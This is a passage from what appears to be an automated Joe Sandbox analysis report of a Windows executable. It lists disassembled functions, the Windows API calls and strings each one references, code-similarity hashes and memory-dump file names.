Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
Instruction ID: ba7d0aea2ea6be02c61d68cde200d0dc230a9f94986c1ff84480d0c98915f50e
Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
Instruction Fuzzy Hash: 87E08C12A2056582FF24BB3AEC426689324AF8CB84B882030CE0C07332CF28D4C18A60

Function 00007FF70E792490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF70E7924A2

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction ID: bda9f7093ab291e691e8a4acf8c315be6ea91c310ff2008a4ee4ad2c3c452b49
Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction Fuzzy Hash: E4D0C912909491D2E954B675EC5103C6250AF9A735FE42720D63E816F2CB1DA8D6A321

Function 00007FF70E797FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE ref: 00007FF70E797FD2

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction ID: 8a3a1b3b95f90e4b5a827b501ff5f513ece53a9b22fd2fd1da8cdba8b9d0ff38
Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction Fuzzy Hash: 34C08C21F15502C1EE0C6B26CCC901813A9BF48B04FA04039C10C81120CF2CD4EB9356

Function 00007FF70E7BFA04 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF70E7BFA59

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction ID: 7ade1d7985fcebe1b5197293f50360bcfcbd228d294eac38872f01a91bbc63ab
Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction Fuzzy Hash: 0CF04955B0920749FE5CBA62DD113B5D2845FAEF84F8C7430CA8E8A381EF2CA6814230

Function 00007FF70E7920D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000001,00007FF70E79207E), ref: 00007FF70E7920F6

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction ID: b1dddba548f832483851c2ae39075cbfe3ba39425929b727b5a9d49a8b4c4b4a
Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction Fuzzy Hash: BFF0A422A4868295FB24AB30F841379A670EF18B78F986335D73C011E5CF28D8A58320

Function 00007FF70E7BD94C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF70E7BD98A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction ID: 40990470abbb7e68d2c2697e31debfeda355998b825640715ffae4a3e231aac0
Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction Fuzzy Hash: D2F05811B0920745FF647AB1DC013B592959FAC7A4FC87630DFAE862C1DF2CA4808231

Non-executed Functions

Function 00007FF70E78C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E78DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70E78CF4B), ref: 00007FF70E78DE27
Part of subcall function 00007FF70E78DE04: GetLastError.KERNEL32 ref: 00007FF70E78DE88
Part of subcall function 00007FF70E78DE04: CloseHandle.KERNEL32 ref: 00007FF70E78DE9B

wcscpy.LIBCMT ref: 00007FF70E78CBC8
wcscpy.LIBCMT ref: 00007FF70E78CBFE
CreateFileW.KERNEL32 ref: 00007FF70E78CC38
DeviceIoControl.KERNEL32 ref: 00007FF70E78CD01
CloseHandle.KERNEL32 ref: 00007FF70E78CD12
GetLastError.KERNEL32 ref: 00007FF70E78CD2E
RemoveDirectoryW.KERNEL32 ref: 00007FF70E78CD7D
DeleteFileW.KERNEL32 ref: 00007FF70E78CD88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CE89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CE8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CE9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CEA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CEAD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CEB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CEB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CEBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CEC5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CECB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78CED7

Strings

SeRestorePrivilege, xrefs: 00007FF70E78C343
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF70E78C34F
UNC\, xrefs: 00007FF70E78C53F, 00007FF70E78C55D
\??\, xrefs: 00007FF70E78C392, 00007FF70E78C3B8

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2659423929-3508440684
Opcode ID: 00964161ca9ce986acf484eb71c93c2db3db382fc2b8f17ad7e68b1fb415a3bc
Instruction ID: b41b5bbcd851ed94d118f53605cbacbb6ecae34b26a5f74df48aa38304f19529
Opcode Fuzzy Hash: 00964161ca9ce986acf484eb71c93c2db3db382fc2b8f17ad7e68b1fb415a3bc
Instruction Fuzzy Hash: 7962E262F4864285FB00EB74D9443BDA361AF997A4F906332DA6C57AD9DF3CE185C320

Function 00007FF70E79F180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF70E7A0528

Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB67
Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB80

Part of subcall function 00007FF70E7AB0DC: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00007FF70E7A0429), ref: 00007FF70E7AB110
Part of subcall function 00007FF70E7AB0DC: SetLastError.KERNEL32 ref: 00007FF70E7AB153

Part of subcall function 00007FF70E78129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E781396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A0490
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A0496
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A049C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A04F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A0532
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7A0538

Strings

%s: %s, xrefs: 00007FF70E79FC11
%ls, xrefs: 00007FF70E79F3AC, 00007FF70E79F3FF

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
String ID: %ls$%s: %s
API String ID: 2539828978-2259941744
Opcode ID: 7531b1a8951024dce7d14e1856eeb041d056becd58a60b273f62812b6ec532c2
Instruction ID: b40c61894d3f8fe4856b5ce88fdfdfe4e49a1a9255f4717d9a263bad7a16f2c2
Opcode Fuzzy Hash: 7531b1a8951024dce7d14e1856eeb041d056becd58a60b273f62812b6ec532c2
Instruction Fuzzy Hash: 22B2E762A1968241EA14BB25EC542BEE311FFDE790F942336E69D477E6EF2CE540C310

Function 00007FF70E7C2550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7C2C12
memcpy_s.LIBCMT ref: 00007FF70E7C35BF
memcpy_s.LIBCMT ref: 00007FF70E7C3666

Part of subcall function 00007FF70E7C38BC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7C38EE

memcpy_s.LIBCMT ref: 00007FF70E7C372F

Part of subcall function 00007FF70E7BD008: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BD02D

Strings

1#SNAN, xrefs: 00007FF70E7C37C9
1#IND, xrefs: 00007FF70E7C37AA
1#INF, xrefs: 00007FF70E7C3807
1#QNAN, xrefs: 00007FF70E7C37E8

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfomemcpy_s
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 1759834784-2761157908
Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction ID: 4033c06fb62767e2d555f85042e5686346aaa6bf307d7c148aa905871c3ac03d
Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
Instruction Fuzzy Hash: ABB22872A085C28BE725AE24DC407FDB7A9FF4C398F906139DA0957B95DF38E5848B10

Function 00007FF70E791A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF70E791A97
GetLongPathNameW.KERNEL32 ref: 00007FF70E791AE0
GetShortPathNameW.KERNEL32 ref: 00007FF70E791B21
GetShortPathNameW.KERNEL32 ref: 00007FF70E791B6A

Part of subcall function 00007FF70E7A13C4: CompareStringW.KERNEL32 ref: 00007FF70E7A13E3

MoveFileW.KERNEL32 ref: 00007FF70E791DFE
MoveFileW.KERNEL32 ref: 00007FF70E791E65

Part of subcall function 00007FF70E792134: CreateFileW.KERNEL32 ref: 00007FF70E79223C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791FE1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791FE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E791FED

Strings

rtmp, xrefs: 00007FF70E791CF4, 00007FF70E791D03

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
String ID: rtmp
API String ID: 3587137053-870060881
Opcode ID: 2d571345357ed831951e913cf5b34db2d9c750839b47aacb8777740eed476449
Instruction ID: 3cda63535a06badd618b244c7614a4313682e2bac6cab6ce7921722c3754c2ef
Opcode Fuzzy Hash: 2d571345357ed831951e913cf5b34db2d9c750839b47aacb8777740eed476449
Instruction Fuzzy Hash: 2DF1D122B0AA8281EB10EB75DC801BDA761FF993D4FD02132EA4D47AA9DF3CD595C350

Function 00007FF70E795B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF70E795BC2
GetFullPathNameW.KERNEL32 ref: 00007FF70E795C0E
GetFullPathNameW.KERNEL32 ref: 00007FF70E795D2B
GetFullPathNameW.KERNEL32 ref: 00007FF70E795D70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E795EE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E795EE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E795EEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E795EF2

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FullNamePath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1693479884-0
Opcode ID: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
Instruction ID: 81c92fb70bf4fb5a570b010939f43dc488e77fa492710fc75dba9872ab8d5eca
Opcode Fuzzy Hash: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
Instruction Fuzzy Hash: 5FA1D362F15A6244FE01AB79DC441BCA361AF8DBE4B906235DE6D17BD9DF3CE0818320

Function 00007FF70E7B3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF70E7B318C
RtlCaptureContext.KERNEL32 ref: 00007FF70E7B31B9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF70E7B31D3
RtlVirtualUnwind.KERNEL32 ref: 00007FF70E7B3214
IsDebuggerPresent.KERNEL32 ref: 00007FF70E7B3268
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF70E7B3289
UnhandledExceptionFilter.KERNEL32 ref: 00007FF70E7B3294

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction ID: 9218853679e6384368455767ac7a6991fa1d53cb2dc483803e0abeb60dc451f5
Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction Fuzzy Hash: C0316F72608B819AEB649F60EC503EDB364FF98754F845039DA8D47A88DF7CD589C720

Function 00007FF70E7B76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF70E7B7751
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF70E7B7769
RtlVirtualUnwind.KERNEL32 ref: 00007FF70E7B77A4
IsDebuggerPresent.KERNEL32 ref: 00007FF70E7B77DD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF70E7B77E7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF70E7B77F2

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction ID: 6b88782661909a02325d40e06faaff7dc2d86ccb47e6992503f09d9832055f12
Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction Fuzzy Hash: D0316132608B8195EB649F25EC403AEB3A4FF98754F941136EA8D43B99DF3CD545CB10

Function 00007FF70E781AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781EA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781EAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781EB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781EBB

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: fb96d10bca390bfec114724123450dd1eda7456c883d7babf62e98013e8dd4f7
Instruction ID: aedf1b96bd3088bf3939968b179ea8bce196aa62c9384c4b55795d0f7353eec8
Opcode Fuzzy Hash: fb96d10bca390bfec114724123450dd1eda7456c883d7babf62e98013e8dd4f7
Instruction Fuzzy Hash: CEB1F422B5668686EB10AB65DD442EDA361FFAD794FC02231EA8C07BD9DF3CD541C320

Function 00007FF70E7BFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF70E7BFAC4

Part of subcall function 00007FF70E7B7934: GetCurrentProcess.KERNEL32(00007FF70E7C0CCD), ref: 00007FF70E7B7961

Strings

., xrefs: 00007FF70E7BFEE4
*?, xrefs: 00007FF70E7BFAEB

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
